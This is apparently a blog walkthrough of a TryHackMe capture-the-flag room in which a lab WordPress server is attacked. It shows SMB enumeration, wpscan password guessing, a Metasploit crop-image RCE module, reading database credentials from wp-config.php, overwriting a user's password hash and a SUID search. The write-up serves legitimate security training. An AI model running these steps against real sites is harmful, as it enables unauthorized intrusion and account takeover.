Billy Joel made a WordPress blog! Can you hack it?

TryHackMe Blog Room Walktrough Billy Joel made a blog on his home computer and has started working on it.  It’s going to be so awesome!

Billy Joel WordPress Blog!

TryHackMe Blog Room
TryHackMe Blog Room

TryHackMe Blog Room Link: https://tryhackme.com/room/blog

Enumerate this box and find the 2 flags that are hiding on it!  Billy has some weird things going on his laptop.  Can you maneuver around and get what you need?  Or will you fall down the rabbit hole…

In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.

Credit to Sq00ky for the root privesc idea 😉

TryHackMe Blog Room Walktrough

On this Lab we need to attack a WordPress blog and extract two flags and answer three questions about the system.

First I will scan the server using Nmap in order to find open ports and what services are running on each port, since we know that we are attacking a WordPress blog let’s execute gobuster to find some hidden folders.

Learning Topics:

Prepare Host Access

In order to test this machine effectively is necessary to add the host IP into our hosts file.

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ vi /etc/hosts
<IP>   blog.thm
TryHackMe Blog Room

Enumerate Host

Verify open ports and Services with Nmap

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ nmap 10.10.238.30

Enumerate Samba

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ smbmap -H 10.10.238.30
TryHackMe Blog Room

Connect to Samba

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ smbclient //10.10.238.30/BillySMB
TryHackMe Blog Room
[adinserter block=”4″]

Download files

TryHackMe Blog Room
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ steghide extract -sf Alice-White-Rabbit.jpg
TryHackMe Blog Room
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ cat rabbit_hole.txt
TryHackMe Blog Room
[adinserter block=”4″]
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ exiftool tswift.mp4
TryHackMe Blog Room
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ exiftool Alice-White-Rabbit.jpg
TryHackMe Blog Room

Enumerate WordPress Blog

[adinserter block=”4″]
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ wpscan --url http://10.10.238.30/ --passwords passwords.txt
TryHackMe Blog Room
TryHackMe Blog Room
TryHackMe Blog Room
[adinserter block=”4″]
TryHackMe Blog Room
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ use exploit/multi/http/wp_crop_rce
TryHackMe Blog Room

Privilege Escation

Read more about: Linux Privilege Escalation

┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ python -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116
[adinserter block=”4″]
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ cat wp-config.php
define('DB_NAME', 'blog');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'LittleYellow--RFS');
┌──(kali㉿B0untyB0x)-[~/Desktop/THM_WP_Blog]
└─$ mysql -u wordpressuser -h localhost -p
TryHackMe Blog Room
TryHackMe Blog Room
TryHackMe Blog Room
[adinserter block=”4″]
TryHackMe Blog Room
wp-users table
UPDATE wp_users 
SET 
    user_pass = '$P$BedNwvQ29vr1TPd80CDl6WnHy--RFS'
WHERE
    user_nicename = "bjoel";
[adinserter block=”4″]
find / -perm -u=s -type f 2>/dev/null
www-data@blog:/var/www/wordpress$ /usr/sbin/checker
TryHackMe Blog Room
TryHackMe Blog Room

Oh hi there 👋 It’s nice to meet you.

Sign up to receive awesome content in your inbox, every month.

Read our privacy policy for more info.

PopLAbSec_Logo

Hacking tips!

We don’t spam! Read our privacy policy for more info.